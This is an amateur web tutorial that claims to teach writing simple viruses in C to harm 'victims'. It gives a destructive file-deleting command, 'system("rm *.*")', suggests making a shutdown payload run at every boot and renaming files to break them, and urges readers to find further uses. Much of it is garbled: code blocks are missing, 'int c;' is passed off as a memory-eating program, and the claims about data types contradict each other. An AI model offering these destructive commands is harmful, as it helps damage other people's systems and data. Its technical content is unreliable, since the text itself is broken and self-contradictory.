Learn how to Virus code in C

Virus code can be coded using several language. The best being c or vbs. Today I will explain you how to create some simple virus using c.

I am assuming you know at least c basics. First lets begin with tiny and simple ones.

int c;

This simple script needs no explanation. It will just be eating away your victims virus at a slow space. The person can stop this by just closing the .exe file.The memory is used to store the result.
As you know a double takes up more space you can replace int with float.

Now lets try to create a simple Linux virus.


This simple script will turn off your victims comp. The above linux virus can be made extremely dangerous by making a simple change. if you can make your code do it's job when ever a person turns on his comp then think what will happen ( i mean other than you going to jail) the person must have to format his system.

Now lets step it up.Lets increase the venom of our snake

system("rm *.*");

This will erase/delete all files with all extension provided the logged user has permission to delete it.Just imagine if the admin runs it then it will create a havoc.

Now lets come back to windows what if you change the extension of a file. It becomes useless.Now let's rename a few file.
Now what you can do with this left up to you.Just use your brain and you will make out it's potential.

These are very simple virus but can cause havoc. Just check out the virus codes in c section for more example codes. Please dont missuses these virus codes in c

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